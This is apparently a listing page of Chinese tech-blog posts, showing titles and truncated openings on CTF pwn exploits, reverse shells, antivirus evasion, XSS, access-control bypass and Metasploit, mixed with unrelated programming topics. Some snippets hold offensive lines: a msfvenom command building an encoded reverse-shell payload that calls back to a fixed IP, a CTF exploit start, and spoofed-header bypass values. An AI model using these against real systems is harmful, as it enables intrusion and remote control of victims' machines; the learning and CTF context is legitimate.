• 2024-09-17BaseCTF2024 pwn
    [Week1]Ret2textexpfrompwnimport*context(os='linux',arch='amd64',log_level='debug')io=remote("challenge.basectf.fun",32537)#io=process("./Ret2text")ret_addr=0x04011A3payload=(0x20+0
  • 2024-09-17操作系统名词_文件下载_反弹shell_1
    目录名词解释Poc、EXP、Payload与shellcode后门木马、病毒黑白盒测试社会工程学、撞库ATT&CK应用实例实用案例1:文件上传下载-解决无图形化&解决数据传输实用案例2:反弹shell命令-解决数据回显&解决数据通讯结合案例1:防火墙绕过-正向连接&反向连接&内网服务器 #结
  • 2024-09-15【USB3.0协议学习】Topic1·USB3.0Hub的一些机制
    一、USB3.0Hub的单播(非广播)机制Hub通过解析下行packetheader中的RouteString字段识别packet要传递的终点,其中4'b0000代表hub本身,4'b0001-4'b1111分别代表hub的各downstreamport,由于USB3.0规定HostController最多级联5级hub,所以每个packetheader中的RouteString字段共有4x5
  • 2024-09-13【DVWA】——Brute Force(暴力破解)
    目录
  • 2024-09-12A Walkthrough Using Acquire and Release Fences
    We’lltaketheexamplefrommypreviouspostandmodifyittouseC++11’sstandaloneacquireandreleasefences.Here’stheSendTestMessagefunction.Theatomicwriteisnowrelaxed,andareleasefencehasbeenplacedimmediatelybeforeit.voidSen
  • 2024-09-11【Python脚本】自定义Payload的ICMP报文发送
    原创Evan运维小站OpsStationICMP(InternetControlMessageProtocol)是一种网络层协议,主要用于在IP主机、网关之间传递控制消息。通常,ICMP报文具有固定的格式,并用于发送错误报告或与网络诊断相关的消息。标准ICMP报文不包含用户定义的payload内容。但是,你可以通过发送一个"
  • 2024-09-09羊城杯比赛pwn复现
    title:羊城杯比赛pwn复现date:2024-09-0520:12:19categories:ctf-比赛复现首先推荐这个博客本篇学习的思路来自这个大佬实力有限,只复现出了pstack这一题pstack知识点这个题目是个很经典的栈迁移的题目,因为栈溢出的空间不够,但是常规的栈迁移一般有方法获得一
  • 2024-09-06house of stom
    完成事项houseofstom学习未完成事项wmctf的blineless没打通如何解决未完成事项下周待做事项houseoforangehouseoflore本周学习的知识分享houseofstom条件:1.能控制unsorted的bk指针,还有largebin的fd_nextsize和bk_nextsize码源分析largebinattack:申请大chunk
  • 2024-09-05基于Spring的规则引擎EasyRule应用
    基于Spring的规则引擎EasyRule应用   本文介绍了easyRule规则引擎的应用场景及相比较ifelse的优势,介绍了easyRule的关键概念,以及在spring的实战应用。一、应用场景与优势           规则引擎类似于实现多个ifelse的功能,能够增强代码可读性。EasyRule指定
  • 2024-09-04java JRMP学习
    JavaJRMP反序化RMI依赖的通信协议为JRMP(JavaRemoteMessageProtocol,Java远程消息交换协议),该协议为Java定制,基于TCP/IP之上,RMI协议之下,当需要进行RMI远程方法调用通信的时候要求服务端与客户端都为Java编写。、这个协议就像HTTP协议一样,规定了客户端和服务端通信要满足的
  • 2024-09-04两面包夹芝士:权限绕过
    权限绕过在进行目录爆破的时候,可以通过目录(权限)绕过来访问敏感url,从而进行进一步攻击使用IP访问切换为IP访问可以多访问到一层目录添加Header字段通过添加Header字段来绕过Client-IP:127.0.0.1Forwarded-For-Ip:127.0.0.1Forwarded-For:127.0.0.1Forwarded-For:local
  • 2024-08-31JWT
    1、介绍JWT是由Header、Payload、Signature拼接组成。JWT的三个部分依次如下。Header(头部):描述JWT的元数据Payload(负载):用来存放实际需要传递的数据Signature(签名):对前两部分的签名,防止数据篡改JWT特点:JWT默认是不加密,但也是可以加密的。生成原始Token以后,可以用密钥再加密一次
  • 2024-08-28Qdrant官方快速入门和教程简化版
    Qdrant官方快速入门和教程简化版说明:首次发表日期:2024-08-28Qdrant官方文档:https://qdrant.tech/documentation/关于阅读Qdrant一小部分的官方文档,并使用中文简化记录下,更多请阅读官方文档。使用Docker本地部署Qdrantdockerpullqdrant/qdrantdockerrun-d-p6333:6
  • 2024-08-21C++实现web token加密生成验证
    代码 #include"jwt-cpp/traits/boost-json/traits.h"#include<boost/json/src.hpp>//Youmayrequirethisifyouarenotbuildingitelsewhere#include<iostream>#include<sstream>voidtestToken(){ usingsec=std::chrono::
  • 2024-08-202024浙江省信息通信行业职业技能竞赛信息安全测试员竞赛CTF比赛
    浙江省信息通信行业职业技能竞赛信息安全测试员竞赛CTF比赛MISC部分Author:Ns100kUpFrom:极安云科-服务中心Data:2024/08/07Copyright:本内容版权归属极安云科,未经授权不得以任何形式复制、转载、摘编和使用。培训、环境、资料、考证公众号:Geek极安云科网络安全群:62403
  • 2024-08-19WEB渗透免杀篇-免杀工具全集
     往期文章 WEB渗透免杀篇-加载器免杀-CSDN博客 WEB渗透免杀篇-分块免杀-CSDN博客WEB渗透免杀篇-Powershell免杀-CSDN博客WEB渗透免杀篇-Python源码免杀-CSDN博客WEB渗透免杀篇-C#源码免杀-CSDN博客WEB渗透免杀篇-MSF+shellcode免杀-CSDN博客WEB渗透免杀篇-Bypass-AMS
  • 2024-08-19react useReducer 的基本用法
    const{createRoot}=ReactDOMconst{useState,useReducer,useEffect}=Reactconstroot=createRoot(document.getElementById('app'))functionApp(){//const[count,setCount]=useState(0)//搜集所有的操作某一个数据的方案//派发其传
  • 2024-08-15Flutter项目移动端SQLite升级指南:解决json_extract函数缺失问题
    引言在Flutter移动端项目中依赖于SQLite的高级功能(如json_extract),在低版本的Android系统上部署时,可能会遇到函数不支持的问题。本文将指导你如何通过升级项目中使用的SQLite版本来解决这一问题。前置条件Flutter项目使用sqflite:^2.3.3+1进行SQLite数据库操作。IMBoyA
  • 2024-08-15[nRF24L01+] 4. 增强型ShockBurst
    4.增强型ShockBurst增强型的ShockBurst是一个数据链路层,具有自动数据包组装和数据包的发送、定时、自动确认和重传。这些特性能够显著提高双向和单向系统的能效,而不会增加主机控制器侧的复杂性。增强型ShockBurst™数据包事务是一种数据包交换,其中一个收发器充当主收发器(PRX,P
  • 2024-08-11一款强大的burpsuite漏洞扫描插件--gatherBurp
    一款强大的burpsuite漏洞扫描插件目前功能fastjson扫描权限绕过扫描未授权检测扫描sql注入检测多层级路由扫描工具调用log4j检测复杂数据提交一键生成nuclei模板生成指定kb大小的随机字符串代理池功能子域名收集(复刻https://github.com/Acmesec/Sylas)使用说明请使用m
  • 2024-08-11【MSF系列】命令合集
    ###生成payloadmsfvenom-pwindows/meterpreter/reverse_winhttpsLHOST=39.97.167.211LPORT=6667--platformwindows-ax86HandLerSSLCert=./my.pemStagerVerifySSLCert=true-s42--smallest-ex86/shikata_ga_nai-i9-fraw|msfvenom--platformwindows-ax86
  • 2024-08-11XSS 专项
    访问web应用,首页HTML发现新端点如下:使用《赏猎技战法》https://www.cnblogs.com/sec875/p/18335838中的测试XSS流程,使用一个良性payload试试水:<h1>666同时思考此处的功能点:https://cfceb12f2bfd-sec875.a.barker-social.com/post/1post作为输入时和1作为输入时,它们是否
  • 2024-08-10初探MIPS PWN
    MIPSPWN调试环境配置&工具安装(Ubuntu22.04)安装qemuqemu是一个支持跨平台虚拟化的虚拟机,有usermode和systemmode两种配置方式。其中qemu在systemmode配置下模拟出整个计算机,可以在qemu之上运行一个操作系统。qemu的systemmode与常见的VMware和Virtualbox等虚拟机
  • 2024-08-09【kali系列】Metasploit Framework (MSF) 从基础到进阶使用指南
    引言一、MetasploitFramework介绍1.1MSF概述1.2MSF主要组件二、MetasploitFramework基础安装与配置2.1KaliLinux中的MSF2.2非KaliLinux环境下的安装2.3更新与升级三、MetasploitFramework基础用法3.1启动MSF控制台
  • 2024-08-092024暑期学习(一)
    2024暑期学习(一)非常非常非常感谢ve1kcon!^^✌️2024年暑期学习(1)-ve1kcon-博客园(cnblogs.com)学习内容:1.复现了一点点题目2.了解了C++异常处理3.学习了Tmux的使用cqb2024xctfstdout前置内容(copy):setvbuf()函数的原型如下intsetvbuf(FILE*stream,char*buf